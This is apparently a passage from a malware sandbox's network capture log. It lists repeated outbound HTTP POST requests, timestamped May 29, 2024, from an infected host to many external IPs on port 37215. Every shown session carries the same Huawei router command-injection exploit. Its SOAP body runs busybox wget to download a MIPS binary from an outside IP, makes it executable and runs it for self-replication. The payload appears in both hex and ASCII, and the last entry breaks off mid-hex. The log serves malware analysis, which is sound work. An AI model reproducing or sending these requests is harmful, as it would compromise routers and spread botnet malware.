                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1918192.168.2.136058841.142.162.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.657716990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1919192.168.2.1344966157.83.36.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.657748938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1920192.168.2.133978827.59.0.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659060955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1921192.168.2.1335130157.155.46.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659228086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1922192.168.2.1351782197.127.116.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659770966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1923192.168.2.133973441.247.1.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659836054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1924192.168.2.1358060197.97.93.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659842968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1925192.168.2.1335980157.148.96.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659868956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1926192.168.2.133677041.236.195.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659912109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1927192.168.2.134508841.248.235.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:22.659921885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 